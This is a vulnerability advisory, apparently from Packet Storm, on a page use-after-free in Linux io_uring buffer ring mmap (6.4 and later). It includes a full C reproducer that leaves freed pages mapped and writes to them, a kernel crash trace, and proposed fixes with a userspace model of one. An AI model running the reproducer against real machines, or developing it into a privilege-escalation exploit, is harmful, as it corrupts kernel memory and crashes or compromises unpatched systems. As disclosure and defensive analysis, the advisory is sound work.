Linux 6.4 io_uring Use-After-Free

Linux versions 6.4 and above suffer from an io_uring page use-after-free vulnerability via buffer ring mmap.

Packet Storm
Linux >=6.4: io_uring: page UAF via buffer ring mmap

Since commit c56e022c0a27 ("io_uring: add support for user mapped provided
buffer ring"), landed in Linux 6.4, io_uring makes it possible to allocate,
mmap, and deallocate "buffer rings".

A "buffer ring" can be allocated with
io_uring_register(..., IORING_REGISTER_PBUF_RING, ...) and later deallocated
with io_uring_register(..., IORING_UNREGISTER_PBUF_RING, ...).
It can be mapped into userspace using mmap() with offset
IORING_OFF_PBUF_RING|..., which creates a VM_PFNMAP mapping, meaning the MM
subsystem will treat the mapping as a set of opaque page frame numbers not
associated with any corresponding pages; this implies that the calling code is
responsible for ensuring that the mapped memory can not be freed before the
userspace mapping is removed.

However, there is no mechanism to ensure this in io_uring: It is possible to
just register a buffer ring with IORING_REGISTER_PBUF_RING, mmap() it, and then
free the buffer ring's pages with IORING_UNREGISTER_PBUF_RING, leaving free
pages mapped into userspace, which is a fairly easily exploitable situation.

reproducer:
==============================================================
#define _GNU_SOURCE
#include <unistd.h>
#include <err.h>
#include <string.h>
#include <stdio.h>
#include <ctype.h>
#include <sys/syscall.h>
#include <sys/mman.h>
#include <linux/io_uring.h>

#define SYSCHK(x) ({          \
  typeof(x) __res = (x);      \
  if (__res == (typeof(x))-1) \
    err(1, "SYSCHK(" #x ")"); \
  __res;                      \
})

int main(void) {
  struct io_uring_params params = {
    .flags = IORING_SETUP_NO_SQARRAY
  };
  int uring_fd = SYSCHK(syscall(__NR_io_uring_setup, /*entries=*/40, &params));
  printf("uring_fd = %d\n", uring_fd);

  struct io_uring_buf_reg reg = {
    .ring_entries = 1,
    .bgid = 0,
    .flags = IOU_PBUF_RING_MMAP
  };
  SYSCHK(syscall(__NR_io_uring_register, uring_fd, IORING_REGISTER_PBUF_RING, &reg, 1));

  void *pbuf_mapping = SYSCHK(mmap(NULL, 0x1000, PROT_READ|PROT_WRITE, MAP_SHARED, uring_fd, IORING_OFF_PBUF_RING));
  printf("pbuf mapped at %p\n", pbuf_mapping);

  struct io_uring_buf_reg unreg = { .bgid = 0 };
  SYSCHK(syscall(__NR_io_uring_register, uring_fd, IORING_UNREGISTER_PBUF_RING, &unreg, 1));
  while (1) {
    memset(pbuf_mapping, 0xaa, 0x1000);
    usleep(100000);
  }
}
==============================================================

When run on a system with the debug options

    CONFIG_PAGE_TABLE_CHECK=y
    CONFIG_PAGE_TABLE_CHECK_ENFORCED=y

this will splat with the following error, when __page_table_check_zero()
detects that a page that's being freed is still mapped into userspace:
==============================================================
------------[ cut here ]------------
kernel BUG at mm/page_table_check.c:146!
invalid opcode: 0000 [#1] PREEMPT SMP KASAN
CPU: 1 PID: 554 Comm: uring-mmap-pbuf Not tainted 6.7.0-rc3 #360
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.2-debian-1.16.2-1 04/01/2014
RIP: 0010:__page_table_check_zero+0x136/0x150
Code: a8 40 0f 84 1f ff ff ff 48 8d 7b 48 e8 93 8a fd ff 48 8b 6b 48 40 f6 c5 01 0f 84 08 ff ff ff 48 83 ed 01 e9 02 ff ff ff 0f 0b <0f> 0b 0f 0b 0f 0b 5b 48 89 ef 5d 41 5c 41 5d 41 5e e9 f4 ea ff ff
RSP: 0018:ffff888029aa7c70 EFLAGS: 00010202
RAX: 0000000000000001 RBX: ffff8880011789f0 RCX: dffffc0000000000
RDX: 0000000000000007 RSI: ffffffff83ca598e RDI: ffff8880011789f4
RBP: ffff8880011789f0 R08: 0000000000000000 R09: ffffed100022f13e
R10: ffff8880011789f7 R11: 0000000000000000 R12: 0000000000000000
R13: ffff8880011789f4 R14: 0000000000000001 R15: 0000000000000000
FS:  00007f745f01a500(0000) GS:ffff88806d280000(0000) knlGS:0000000000000000
CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 00005610bbfb8008 CR3: 0000000016ac3004 CR4: 0000000000770ef0
PKRU: 55555554
Call Trace:
 <TASK>
[...]
 free_unref_page_prepare+0x282/0x450
 free_unref_page+0x45/0x170
 __io_remove_buffers.part.0+0x38c/0x3c0
 io_unregister_pbuf_ring+0x146/0x1e0
[...]
 __do_sys_io_uring_register+0xa03/0x11c0
[...]
 do_syscall_64+0x43/0xf0
 entry_SYSCALL_64_after_hwframe+0x6e/0x76
RIP: 0033:0x7f745ef4bf59
Code: 00 c3 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 44 00 00 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89 c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d 07 6f 0c 00 f7 d8 64 89 01 48
RSP: 002b:00007ffe29cbac98 EFLAGS: 00000202 ORIG_RAX: 00000000000001ab
RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007f745ef4bf59
RDX: 00007ffe29cbaca0 RSI: 0000000000000017 RDI: 0000000000000003
RBP: 00007ffe29cbadb0 R08: 00007ffe29cbab6c R09: 0000000000000000
R10: 0000000000000001 R11: 0000000000000202 R12: 00005610bbb700d0
R13: 00007ffe29cbae90 R14: 0000000000000000 R15: 0000000000000000
 </TASK>
Modules linked in:
---[ end trace 0000000000000000 ]---
==============================================================

When run on a system without those options, this reproducer will randomly
corrupt memory and probably on most runs crash the machine.
I tried it once and after I tried using some other programs, I got some random
kernel #GP fault.

One way to fix this might be to add some mapping counter to
`struct io_buffer_list`, and then:

 - increment that counter in io_uring_validate_mmap_request() for PBUF_RING
   mappings
 - increment that counter in the vm_area_operations ->open() handler
 - decrement that counter in the vm_area_operations ->close() handler
 - refuse IORING_UNREGISTER_PBUF_RING if the counter is non-zero?

Or alternatively free the io_buffer_list when the counter drops to zero, and let
the counter start at 1.

(I'm not sure what the lifetime rules for other accesses to the io_buffer_list's
memory are - it looks like most paths only access the io_buffer_list under some
lock? Is the idea that the kernel actually accesses the buffer through userspace
pointers, or something like that? I'll have to stare at this some more before I
understand it...)

This bug is subject to a 90-day disclosure deadline. If a fix for this
issue is made available to users before the end of the 90-day deadline,
this bug report will become public 30 days after the fix was made
available. Otherwise, this bug report will become public at the deadline.
The scheduled deadline is 2024-02-26.

Found by: [email protected]
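
The mapping-counter idea from the report (the variant that refuses to unregister while a mapping exists) can be modelled in plain userspace C. This is only a sketch of the bookkeeping, not kernel code and not necessarily what any upstream fix looks like: `struct pbuf_ring_model` and every `pbuf_*` function are hypothetical names invented for this illustration, `calloc()`/`free()` stand in for page allocation, and no locking is modelled.

```c
#include <assert.h>
#include <errno.h>
#include <stddef.h>
#include <stdlib.h>

/* Hypothetical userspace stand-in for the kernel's struct io_buffer_list. */
struct pbuf_ring_model {
    void  *pages;       /* backing memory of the buffer ring (NULL if freed) */
    size_t len;         /* size of the backing memory in bytes */
    int    mmap_count;  /* number of live userspace mappings */
};

/* Models IORING_REGISTER_PBUF_RING: allocate the ring, no mappings yet. */
int pbuf_register(struct pbuf_ring_model *r, size_t len)
{
    r->pages = calloc(1, len);
    if (!r->pages)
        return -ENOMEM;
    r->len = len;
    r->mmap_count = 0;
    return 0;
}

/* Models the increments done at mmap() validation and in the VMA ->open(). */
void pbuf_map_get(struct pbuf_ring_model *r)
{
    r->mmap_count++;
}

/* Models the decrement done in the VMA ->close() handler. */
void pbuf_map_put(struct pbuf_ring_model *r)
{
    assert(r->mmap_count > 0);
    r->mmap_count--;
}

/* Models IORING_UNREGISTER_PBUF_RING: refuse while any mapping is live. */
int pbuf_unregister(struct pbuf_ring_model *r)
{
    if (!r->pages)
        return -ENOENT;   /* nothing registered */
    if (r->mmap_count > 0)
        return -EBUSY;    /* pages are still mapped, so keep them alive */
    free(r->pages);
    r->pages = NULL;
    return 0;
}

/* Replays the reproducer's register / mmap / unregister order on the model.
 * Returns 0 if the early unregister is refused and the late one succeeds. */
int pbuf_demo(void)
{
    struct pbuf_ring_model ring;

    if (pbuf_register(&ring, 4096) != 0)
        return -1;
    pbuf_map_get(&ring);                 /* userspace maps the ring */
    int early = pbuf_unregister(&ring);  /* attempted while still mapped */
    pbuf_map_put(&ring);                 /* userspace unmaps the ring */
    int late = pbuf_unregister(&ring);   /* attempted after the unmap */
    return (early == -EBUSY && late == 0) ? 0 : -1;
}
```

Calling `pbuf_demo()` from a small `main()` replays the reproducer's sequence against the model. The alternative mentioned in the report (start the counter at 1 and free the list when it drops to zero) would instead move the `free()` into the put path.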
